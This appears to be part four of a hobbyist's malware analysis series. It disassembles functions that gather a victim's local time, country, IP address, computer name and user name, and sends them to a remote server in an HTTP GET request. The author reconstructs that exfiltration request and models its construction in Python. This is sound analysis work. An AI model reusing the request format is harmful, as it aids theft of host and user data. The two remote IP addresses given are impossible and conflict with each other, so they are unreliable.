Examining a piece of malware for strings (sequences of printable characters) can reveal a few clues about what the malware does, or what it is capable of doing. Part three started disassembling the functions to see how closely their behaviour matched the predictions in part two, but sadly ended just as things were getting exciting. In part four, the saga continues.
Part three disassembled the _WinMain@16() function and saw that it called two other malware functions: sub_401eb0(), which downloaded a file before running it with CreateProcess(); and sub_401c40() which part three didn’t disassemble as it was getting quite long.
This part continues by looking at three small ‘utility’ functions which are called by sub_401c40(), and then at sub_401c40() itself. I’ll look at the utility functions first so that they don’t interrupt the flow of sub_401c40()’s analysis.
sub_401a70() referenced the following string:
%04d%02d%02d%02d%02d%02d
It uses the GetLocalTime() Win32 function which stores the local time in to a SystemTime structure. It then proceeds to extract the seconds, minutes, hour, date, month, and year from the SystemTime structure and pushes them on to the stack in that order. It then uses one of the format strings that we identified back in parts one and two, with _sprintf() to format the time information according to the format string above:
.text:00401AC2 push offset a04d02d02d02d02 ; "%04d%02d%02d%02d%02d%02d"
.text:00401AC7 push ecx ; char *
.text:00401AC8 call _sprintf
The ecx register has been loaded with the address that was passed as a parameter to sub_401a70(). The purpose of sub_401a70() then, is to return the local time, in the format ‘yyyyMMddhhmmss’ (year, month, date, hour, minutes, seconds). Basically it answers the question “What’s the time Mr. Wolf?”
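To make the format concrete, here is a minimal Python sketch of what sub_401a70() appears to do. It is a model of the behaviour, not the malware's code: the function name format_local_time is my own invention, and datetime.now() simply stands in for GetLocalTime().

```python
from datetime import datetime

# Same format string that sub_401a70() passes to _sprintf().
TIME_FORMAT = "%04d%02d%02d%02d%02d%02d"


def format_local_time(now=None):
    """Return a timestamp as yyyyMMddhhmmss (hypothetical helper name)."""
    if now is None:
        now = datetime.now()  # stands in for GetLocalTime()
    # Arguments in format-string order: year, month, day, hour, minute, second.
    return TIME_FORMAT % (now.year, now.month, now.day,
                          now.hour, now.minute, now.second)


print(format_local_time(datetime(2012, 3, 4, 5, 6, 7)))  # 20120304050607
```

The fixed date in the last line is only there to make the output predictable; calling format_local_time() with no argument uses the current local time.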
sub_402090() didn’t reference any strings, but it is called from sub_401c40() and so we’ll have a quick look at it. It calls gethostname() to obtain the local host’s host name. If this fails, sub_402090() returns 0.
Next up, in an interesting turn of events, it calls gethostbyname() to resolve the host name it just received to an IP address. After writing C code myself to determine the local host’s IP address, I suspect that the malware is using the combination of gethostname() and gethostbyname() as an easier alternative to calling GetAdaptersAddresses() and wading through its output. If gethostbyname() fails, sub_402090() returns 0.
sub_402090() then takes the first IP address returned (or returns 1 itself if there wasn’t one) by gethostbyname() and passes it to inet_ntoa() to convert the four byte IP address in to a string (in the familiar dotted quad notation). It copies this IP address string in to the buffer passed as the first parameter to sub_402090(), and then returns 1.
It looks like sub_402090() is using gethostname(), followed by gethostbyname() to determine the local host’s IP address, and then calling inet_ntoa() to convert it to a string (the familiar dotted quad notation) — just the kind of thing that would make it easy to send in an HTTP query string.
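The same host name to IP address trick can be sketched in Python. This is only a model under a few assumptions: local_ip_string is a made-up name, the 0/1 status code and output buffer are collapsed into a single return value (None for failure), and a lookup that succeeds without returning any address is simply treated as "no address". The two lookups are passed in as parameters so that the logic can be exercised without touching the network.

```python
import socket


def local_ip_string(get_name=socket.gethostname,
                    resolve=socket.gethostbyname_ex):
    """Model of sub_402090(): dotted quad string, or None on failure."""
    try:
        host_name = get_name()                       # gethostname()
        _name, _aliases, addresses = resolve(host_name)  # gethostbyname()
    except OSError:
        return None                                  # either lookup failed
    if not addresses:
        return None
    # gethostbyname_ex() already returns dotted quad strings, so the
    # inet_ntoa() step is implicit here.
    return addresses[0]
```

Calling local_ip_string() with no arguments uses the real resolver, and what it returns depends entirely on how the local machine resolves its own name.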
If I remember rightly, and I often don’t as I’m getting older so excuse me a moment while I look it up, sub_402100() was a function that only referenced a couple of short strings:
%20
%s%s
I suspected that this function may use those format strings in an sprintf() call to append two strings in a HTTP URL (as ‘%20’ is how a space character is encoded in URLs). This turned out to be incorrect, so let’s see what sub_402100() actually does.
.text:00402100 String2 = byte ptr -0C00h
.text:00402100 String1 = byte ptr -800h
.text:00402100 var_400 = dword ptr -400h
.text:00402100 lpString1 = dword ptr 4
This list, generated by IDA Pro, is suggesting that sub_402100() has three local variables (two strings, String1 and String2; and an unknown variable, var_400), and one parameter (lpString1) which is a pointer to a string.
The local variables are identified by the negative offsets in the above code, and the parameter by its positive offset. These offsets are typically offsets from either the stack pointer (esp register), as they are in this case, or from the frame pointer (ebp register).
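Those offsets also hint at how big each local variable is. The following Python sketch does the arithmetic, on the assumption (mine, not IDA Pro's) that the locals are packed back to back and that the last one runs up to offset 0. The helper name local_sizes is hypothetical.

```python
# Offsets copied from IDA Pro's listing for sub_402100().
locals_by_offset = {"String2": -0xC00, "String1": -0x800, "var_400": -0x400}


def local_sizes(offsets, frame_top=0):
    """Estimate each local's size as the gap to the next higher offset."""
    ordered = sorted(offsets.items(), key=lambda item: item[1])
    sizes = {}
    for index, (name, start) in enumerate(ordered):
        if index + 1 < len(ordered):
            end = ordered[index + 1][1]
        else:
            end = frame_top  # assumption: last local ends at offset 0
        sizes[name] = end - start
    return sizes


print(local_sizes(locals_by_offset))
# {'String2': 1024, 'String1': 1024, 'var_400': 1024}
```

Under that assumption each variable is a 1024 byte buffer. This agrees with the 'rep stosd' later in the function, which zeroes String2 with ecx set to 100h: 0x100 double words of four bytes each is also 1024 bytes.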
After initialising some variables, it runs the following:
.text:00402126 mov eax, [esp+0C10h+lpString1]
.text:0040212D lea ecx, [esp+0C10h+String2]
.text:00402131 push eax ; lpString2
.text:00402132 push ecx ; lpString1
.text:00402133 call ebp ; lstrcpyA
This block of instructions uses lstrcpy() to copy the string passed as a parameter (lpString1) to String2. A trailing ‘A’ in a Win32 function name indicates the ANSI version, which operates on 8-bit character strings (ASCII included), while a trailing ‘W’ indicates the wide character (Unicode) version. This is something which, until now, I have neglected to point out.
It gets a bit confusing because the comments added by IDA Pro are saying that ecx and eax are the lpString1 and lpString2 parameters to lstrcpyA(), as opposed to the String1, String2, and lpString1 variables that it defined previously.
If you read the instructions, you’ll see that eax contains the first parameter (that is the variable that IDA Pro previously identified as lpString1), and that ecx contains the address of (because of the use of the lea instruction, rather than the mov instruction) String2.
So, after all that, that block of code copies the string passed as a parameter, in to the local String2 variable.
.text:00402135 lea edx, [esp+0C10h+String2]
.text:00402139 push 20h ; int
.text:0040213B push edx ; char *
.text:0040213C call _strchr
.text:00402141 mov esi, eax
It then calls the _strchr() function to search for the character with ASCII code 0x20 (which is a space character), in the string String2. Or, if you’d rather have that in English, it searches for a space in the string that was passed to it.
If it doesn’t find a space, it jumps down to the end of the function where it copies String2 back in to the buffer (string) that was passed to it as an argument, and returns. Hey, does this string make my buffer look big?
If it did find a space, it zeros the String1 and var_400 variables using repeat prefixes and store string instructions.
.text:00402182 lea eax, [esp+0C10h+String2]
.text:00402186 lea ecx, [esp+0C10h+String1]
.text:0040218D push eax ; lpString2
.text:0040218E push ecx ; lpString1
.text:0040218F mov [esi], bl
.text:00402191 call ebp ; lstrcpyA
This time, the IDA Pro provided comments are correct. This block of code is using lstrcpy() to copy the ASCII string String2 to String1.
Believe it or not, the instruction at 0x40218f didn’t just wander in from the street, but is actually serving a purpose. The ebx register was set to zero using an ‘xor ebx,ebx’ instruction near the beginning of the function, and the bl register is the lower eight bits of the ebx register, hence it is also 0.
The return value from _strchr(), that is the address where the character was found, was saved in to the esi register immediately after the call to _strchr(). Hence the instruction at address 0x40218f is copying a null byte over the top of the space character that _strchr() found in String2. That is, it is terminating String2 at the first space character.
Excuse me a moment while I check how much is left of this function, as it is tea time and I’m getting hungry.
.text:00402193 lea edx, [esp+0C10h+String1]
.text:0040219A push offset a20 ; "%20"
.text:0040219F push edx ; lpString1
.text:004021A0 call ds:lstrcatA
Right, sub_402100() then appends the string “%20” to the end of the local variable String1. The IDA Pro comment is saying that edx is the lpString1 parameter to lstrcat(), and not the lpString1 parameter passed as an argument to sub_402100(). This is why it is a good idea to give the generically named variables a more meaningful name once you figure out their purpose.
.text:004021A6 inc esi
.text:004021A7 lea eax, [esp+0C10h+var_400]
.text:004021AE push esi ; lpString2
.text:004021AF push eax ; lpString1
.text:004021B0 call ebp ; lstrcpyA
The next block of code increments the esi register which, if you remember, was pointing to the address of the space character in String2. This character is now a null byte, so the inc instruction increments it such that it now points to the first character after the space character (or what is now the null byte) in String2.
It then uses lstrcpy() to copy from this post-space/post-null byte character, in to the local variable var_400. The net effect of this is that it has broken the input string in to two parts — the part before the first space character, which is now in String1 with the string ‘%20’ on the end of it, and the part after the first space character, which is now in var_400.
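The null byte trick is easier to see with a byte buffer in front of you. Here is a small Python sketch of this one pass, using a bytearray to stand in for String2. The helper names c_string and split_at_first_space are my own, and the comments map each step back to the instructions discussed above.

```python
def c_string(buffer, start=0):
    """Read bytes from start up to (not including) the next null byte."""
    end = buffer.find(0, start)
    if end == -1:
        end = len(buffer)
    return bytes(buffer[start:end])


def split_at_first_space(text):
    """Model one pass of sub_402100() over a null terminated buffer."""
    buffer = bytearray(text + b"\x00")       # String2
    space = buffer.find(0x20)                # _strchr(String2, 0x20) -> esi
    if space == -1:
        return None                          # no space: nothing to split
    buffer[space] = 0                        # mov [esi], bl
    string1 = c_string(buffer) + b"%20"      # lstrcpyA, then lstrcatA "%20"
    var_400 = c_string(buffer, space + 1)    # inc esi, then lstrcpyA
    return string1, var_400


print(split_at_first_space(b"hello big world"))
# (b'hello%20', b'big world')
```

Only the first space is handled here, which is why the second space in the example survives in the tail.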
.text:004021B2 mov ecx, 100h
.text:004021B7 xor eax, eax
.text:004021B9 lea edi, [esp+0C10h+String2]
.text:004021BD lea edx, [esp+0C10h+String1]
.text:004021C4 rep stosd
.text:004021C6 lea ecx, [esp+0C10h+var_400]
.text:004021CD lea eax, [esp+0C10h+String2]
.text:004021D1 push ecx
.text:004021D2 push edx
.text:004021D3 push offset aSS ; "%s%s"
.text:004021D8 push eax ; char *
.text:004021D9 call _sprintf
sub_402100() then uses a ‘rep stosd’ instruction to zero String2, before using _sprintf() and our good old ‘%s%s’ format string, to basically append the string in var_400 to the string in String1, and store the result in String2.
What this function has done, then, is search through the string that it is given, look for a space, and replace it with ‘%20’. ‘%20’ is how a space character is encoded in HTTP URLs… but wait, there’s more:
.text:004021DE lea ecx, [esp+0C20h+String2]
.text:004021E2 push 20h ; int
.text:004021E4 push ecx ; char *
.text:004021E5 call _strchr
.text:004021EA mov esi, eax
.text:004021EC add esp, 18h
.text:004021EF cmp esi, ebx
.text:004021F1 jnz loc_40214E
It then calls _strchr() again to search for another space character in String2 and, if it finds one, jumps back to address 0x40214e to replace it with a ‘%20’. If it doesn’t find one, then we have the grand finale (I always thought that ‘finale’ should have an accent, but apparently not):
.text:004021F7 mov eax, [esp+0C10h+lpString1]
.text:004021FE lea edx, [esp+0C10h+String2]
.text:00402202 push edx ; lpString2
.text:00402203 push eax ; lpString1
.text:00402204 call ebp ; lstrcpyA
It copies String2 back to the string that was passed in to the function — that is, it overwrites the original string. I told you it was ‘grand’.
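Putting the whole loop together, sub_402100() can be modelled in a few lines of Python. This is a sketch of the behaviour as I read it from the disassembly, with a made-up function name, and it uses Python strings that grow as needed rather than the fixed stack buffers of the original.

```python
def encode_spaces(text):
    """Model of sub_402100(): replace every space with '%20'."""
    result = text                            # lstrcpyA(String2, lpString1)
    position = result.find(" ")              # _strchr(String2, 0x20)
    while position != -1:
        head = result[:position] + "%20"     # String1 plus the "%20" suffix
        tail = result[position + 1:]         # var_400
        result = head + tail                 # _sprintf(String2, "%s%s", ...)
        position = result.find(" ")          # second _strchr, loop if found
    return result                            # copied back over the input


print(encode_spaces("a b c"))  # a%20b%20c
```

In Python you would normally just write text.replace(" ", "%20"), which gives the same result; the longer version is there to mirror the structure of the assembly.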
Now that we know that function sub_402100() searches through the input string and replaces each occurrence of a space character with the string ‘%20’, I can have some dinner and finish off the star of this article, sub_401c40(), tomorrow.
As much as I’d like to finish it tonight, I have to be up at 04:30 in the morning — the early morning starts required for hot air ballooning here (at least if you want to be able to maintain what little control you have in a balloon), really don’t mix well with spending late nights wading through assembly language code and playing with I.T. stuff.
sub_401c40() starts off by initialising variables, before calling socket() to obtain an AF_INET (Internet address family, IPv4) SOCK_STREAM socket. The protocol is unspecified, which usually only leaves TCP as a protocol option in this case, but technically this could include SCTP.
If the socket() call returns -1 (to indicate an error), sub_401c40() returns 0.
.text:00401D0A push 80 ; hostshort
.text:00401D0C mov [esp+0C38h+name.sa_family], AF_INET
.text:00401D13 call htons
.text:00401D18 push offset cp ; "522.214.171.124"
.text:00401D1D mov word ptr [esp+0C38h+name.sa_data], ax
.text:00401D22 call inet_addr
Here we see the malware calling htons() to convert 80 from host byte order (little endian on Intel 80x86 processors) to network byte order (big endian), before using the IP address string that we previously identified.
The IP address string is passed to the inet_addr() function to convert it from a string in to four bytes in network byte order, as they would appear in the header of an IP packet.
Scattered in amongst this code fragment, you see it setting name.sa_family to AF_INET, and name.sa_data to the contents of the ax register. Those of you who have done network programming may recognise these as being elements of a sockaddr structure.
Those two lines are initialising the address family to be AF_INET (Internet, that is IPv4), and the port (the first two bytes of sa_data when the address family is AF_INET) to be the value returned by htons(), that is, 80 in network byte order. 80/tcp (SOCK_STREAM socket type) is the well known port for HTTP, that is, web servers.
.text:00401D27 lea ecx, [esp+0C34h+name]
.text:00401D2B push 10h ; namelen
.text:00401D2D push ecx ; name
.text:00401D2E push esi ; s
.text:00401D2F mov dword ptr [esp+0C40h+name.sa_data+2], eax
.text:00401D33 call connect
There we have a connect() call — didn’t see that coming. The malware is building a sockaddr_in structure (sockaddr structure for the IPv4 address family) with a port number of 80. The return value from inet_addr(), which is still in the eax register, is placed at offset 2 of sockaddr.sa_data, that is sockaddr_in.sin_addr.
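If the layout of that structure is hard to picture, the following Python sketch builds the same 16 bytes by hand. It is illustrative only: build_sockaddr_in is a hypothetical helper, the address 192.0.2.1 is a documentation address rather than the one in the malware, and zeroing the last eight bytes is my assumption, as the listing doesn't show what the malware leaves there.

```python
import socket
import struct

AF_INET = 2  # value of AF_INET in Winsock


def build_sockaddr_in(ip_string, port):
    """Lay out a 16 byte sockaddr_in the way the listing fills it in."""
    family = struct.pack("<H", AF_INET)     # name.sa_family, host byte order
    port_be = struct.pack("!H", port)       # htons(port) -> sa_data[0:2]
    address = socket.inet_aton(ip_string)   # inet_addr() -> sa_data[2:6]
    padding = b"\x00" * 8                   # rest of sa_data (assumed zero)
    return family + port_be + address + padding


name = build_sockaddr_in("192.0.2.1", 80)
print(len(name), name.hex())
# 16 02000050c00002010000000000000000
```

The length of 16 matches the 10h pushed as namelen, and the bytes 00 50 after the family are port 80 in network byte order.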
The connect() call will hence connect to the remote host, 5126.96.36.199, on port 80/tcp. If the connect call fails, it calls closesocket() and returns 0, otherwise, it calls sub_401a70() which as we’ve seen, returns the local time in ‘yyyyMMddhhmmss’ format (year, month, date, hour, minutes, seconds).
Rightio, this is where we get to confirm that data is leaked, and to see what data is leaked.
.text:00401D4F lea edx, [esp+0C34h+dst]
.text:00401D56 push edx ; dst
.text:00401D57 call sub_401a70
At this point, sub_401c40() starts gathering data. Here you can see it calling sub_401a70() with the address of (it’s an lea instruction not a mov instruction) the dst variable. As we have seen, this will return with the current time (yyyyMMddhhmmss) in the dst variable.
.text:00401D5F lea eax, [esp+0C34h+LCData]
.text:00401D66 push edi ; cchData
.text:00401D67 push eax ; lpLCData
.text:00401D68 push LOCALE_SENGCOUNTRY ; LCType
.text:00401D6D push LOCALE_SYSTEM_DEFAULT ; Locale
.text:00401D72 call ds:GetLocaleInfoA
Now it is calling GetLocaleInfo() with its LCType parameter set to LOCALE_SENGCOUNTRY, to find out what the full English name of the country/region is.
.text:00401D78 lea ecx, [esp+0C34h+nSize]
.text:00401D7C lea edx, [esp+0C34h+Buffer]
.text:00401D80 push ecx ; nSize
.text:00401D81 push edx ; lpBuffer
.text:00401D82 call ds:GetComputerNameA
Reasonably self-explanatory. This will put the computer name in to the variable Buffer, which is nSize bytes large.
.text:00401D88 lea eax, [esp+0C34h+stAddrStr]
.text:00401D8C push eax ; lpstAddrStr
.text:00401D8D call sub_402090
It then calls sub_402090() which obtains the computer’s IP address by using gethostname() to obtain its host name, and then resolving that to an IP address using gethostbyname().
.text:00401D95 test eax, eax
.text:00401D97 jnz short loc_401DA9
.text:00401D99 lea ecx, [esp+0C34h+stAddrStr]
.text:00401D9D push offset aNone ; "NONE"
.text:00401DA2 push ecx ; lpString1
.text:00401DA3 call ds:lstrcpyA
If sub_402090() returned 0, then it copies the string “NONE” in to stAddrStr in place of the IP address.
.text:00401DA9 lea edx, [esp+0C34h+nSize]
.text:00401DAD lea eax, [esp+0C34h+var_A00]
.text:00401DB4 push edx ; nSize
.text:00401DB5 push eax ; lpBuffer
.text:00401DB6 mov [esp+0C3Ch+nSize], edi
.text:00401DBA call ds:GetUserNameA
Looks like it’s going to leak the current user’s user name too, as this code fragment is storing it in to var_A00.
The malware then uses ‘rep stosd’ followed by ‘stosw’ to zero a local variable.
.text:00401DD9 lea ecx, [esp+0C34h+buf]
.text:00401DE0 push offset aGetUpdataTpdb_ ; "GET /updata/TPDB.php?"
.text:00401DE5 push ecx ; char *
.text:00401DE6 stosb
.text:00401DE7 call _sprintf
Here we can see another of the strings being used. Given that we have just seen it connect to a remote host on port 80/tcp (well known port for HTTP), and that the string looks like a HTTP request, it is probably pretty safe to assume that it is now putting a HTTP request together.
The stosb instruction is part of the previous rep stosd/stosw code to zero a local variable. Compilers often interleave bits of code for performance reasons (CPU instruction pipelining for instance, where two or more independent instructions run in parallel).
.text:00401DEC mov edx, [esp+0C3Ch+arg_0]
.text:00401DF3 lea eax, [esp+0C3Ch+var_A00]
.text:00401DFA push edx
.text:00401DFB lea ecx, [esp+0C40h+Buffer]
.text:00401DFF push eax
.text:00401E00 lea edx, [esp+0C44h+stAddrStr]
.text:00401E04 push ecx
.text:00401E05 lea eax, [esp+0C48h+LCData]
.text:00401E0C push edx
.text:00401E0D lea ecx, [esp+0C4Ch+dst]
.text:00401E14 push eax
.text:00401E15 push ecx
.text:00401E16 push offset a1_003 ; "1.003"
.text:00401E1B lea edx, [esp+0C58h+String2]
.text:00401E22 push offset aLg1SLg2SLg3S_0 ; "lg1=%s&lg2=%s&lg3=%s&lg4=%s&lg5=%s&lg6=%s&lg7=%d"
.text:00401E27 push edx ; char *
.text:00401E28 call _sprintf
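That big lump of code is just pushing the variables for the _sprintf() call on to the stack. Arguments are pushed in reverse order, so the last one pushed before the format string (“1.003”) fills the first ‘%s’. This is where you get to work back to see what data is included in the HTTP query string (and hence leaked). This tells us that the query string will be (with the variable names in angled brackets):
lg1=1.003&lg2=<dst>&lg3=<LCData>&lg4=<ipaddrstr>&lg5=<Buffer>&lg6=<var_A00>&lg7=<arg0>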
_sprintf() will store the resulting string in String2 (its first parameter). I’ll recap what data is contained in those variables later as part of the full HTTP request.
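Here is a rough Python equivalent of that _sprintf() call, to show how the pushed values line up with the format string. The parameter names and the sample values are all invented for illustration; only the format string and the “1.003” constant come from the listing.

```python
# Format string and version constant as they appear in the disassembly.
QUERY_FORMAT = "lg1=%s&lg2=%s&lg3=%s&lg4=%s&lg5=%s&lg6=%s&lg7=%d"
VERSION = "1.003"


def build_query(timestamp, country, ip_address, computer_name,
                user_name, status):
    """Fill the query string in the order the arguments reach _sprintf()."""
    return QUERY_FORMAT % (VERSION, timestamp, country, ip_address,
                           computer_name, user_name, status)


# Sample values only; none of these come from a real infection.
print(build_query("20120304050607", "New Zealand", "192.0.2.10",
                  "DESKTOP", "alice", 1))
# lg1=1.003&lg2=20120304050607&lg3=New Zealand&lg4=192.0.2.10&lg5=DESKTOP&lg6=alice&lg7=1
```

Note the space in the sample country name. A raw space isn't valid in a URL, which is presumably why the malware runs the result through sub_402100() before sending it.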
.text:00401E2D lea eax, [esp+0C60h+String2]
.text:00401E34 push eax ; lpString1
.text:00401E35 call sub_402100
Here it calls sub_402100() which, as we’ve seen, will percent encode any spaces in the String2 string.
.text:00401E3A mov edi, ds:lstrcatA
.text:00401E40 add esp, 30h
.text:00401E43 lea ecx, [esp+0C34h+String2]
.text:00401E4A push offset String2 ; " HTTP/1.1\r\nHost: [censored].jp\r\n\r\n"
.text:00401E4F push ecx ; lpString1
.text:00401E50 call edi ; lstrcatA
sub_401c40() then uses lstrcat() to add the protocol version to the request, and to also add a HTTP ‘Host:’ request header. The trailing ‘\r\n\r\n’ represents two new line sequences, which adds one blank line, which in turn signifies the end of the HTTP request headers. Hang in there — we’re almost at the end.
Notice that the preceding block of code has two String2s. The first is a variable, as indicated by the use of an offset from the esp register. The second is a string constant, as indicated by IDA Pro referencing it as ‘offset String2’ and commenting the instruction with the string’s value.
.text:00401E52 lea edx, [esp+0C34h+String2]
.text:00401E59 lea eax, [esp+0C34h+buf]
.text:00401E60 push edx ; lpString2
.text:00401E61 push eax ; lpString1
.text:00401E62 call edi ; lstrcatA
buf contains the start of the HTTP request (‘GET …’), and the variable String2 contains the query string and the rest of the HTTP request. This lstrcat() call will append the variable String2 to buf, thus leaving a complete HTTP request (with headers) in buf.
sub_401c40() then calculates the length of the data in buf (the complete HTTP request) and passes it, along with buf itself, to send() to send it to the remote host. It then calls closesocket() and returns 1 if the send() call succeeded, or 0 if it failed (send() returned -1). This also tells us that it is not expecting to receive any information back from the remote host and that this is simply a request to leak information and possibly to notify of infection.
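The assembly of the request can be summarised with another short Python model. As before this is a sketch, not the malware's code: build_request is a hypothetical name, and example.invalid is a placeholder because the real host name is censored. It deliberately stops short of opening a socket.

```python
REQUEST_START = "GET /updata/TPDB.php?"
HOST = "example.invalid"  # placeholder: the real host name is censored


def build_request(query, host=HOST):
    """Model how sub_401c40() assembles the bytes it hands to send()."""
    tail = query.replace(" ", "%20")                     # sub_402100()
    tail += " HTTP/1.1\r\nHost: " + host + "\r\n\r\n"    # first lstrcatA
    request = REQUEST_START + tail                       # second lstrcatA
    return request.encode("ascii")                       # buffer for send()


request = build_request("lg1=1.003&lg3=New Zealand&lg7=1")
print(request.decode("ascii"))
print(len(request))  # the length that would be passed to send()
```

The order matters: the spaces are encoded before the ‘ HTTP/1.1’ suffix is appended, so the spaces that are part of the HTTP syntax itself are left alone.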
Well that certainly wasn’t short, but we now know what another four functions do:
- sub_401a70() returns the local time in yyyyMMddhhmmss format.
- sub_402090() returns the local host’s IP address as a string.
- sub_402100() takes a string and percent encodes any spaces in it.
- sub_401c40() issues a HTTP request to send information about the infected host.
sub_401c40() sends the following HTTP request:
GET /updata/TPDB.php?lg1=1.003&lg2=<dst>&lg3=<LCData>&lg4=<ipaddrstr>&lg5=<Buffer>&lg6=<var_A00>&lg7=<arg0> HTTP/1.1
Host: [censored].jp
- 1.003 looks like a version number
- <dst> is the local time stamp
- <LCData> is the English name of the country/region from the default locale settings
- <ipaddrstr> is the host’s IP address
- <Buffer> is the host’s computer name as reported by GetComputerName()
- <var_A00> is the user name of the currently logged in user
- <arg0> is the argument passed to sub_401c40()
The query format string is telling us that this is an integer (the ‘%d’). Going back to the code, sub_401c40() is passed the return value from sub_401eb0(). In part three, we saw that this indicates whether or not the CreateProcess() call created the ACCl3.jpg process.
One other function referenced those strings but hasn’t been covered: sub_401ae0(). At a quick glance, it appears to be the same as sub_401c40(), except that it takes the values for query string variables lg1 – lg6 as arguments, and omits lg7. This could be used as a beacon from one of the 100 threads that are started.
The next part will look at some of the remaining functions, although I’m starting to think it won’t go in to as much detail! The remaining functions should be a tad more exciting, as they will be functions that are called from the thread function which starts running after infection.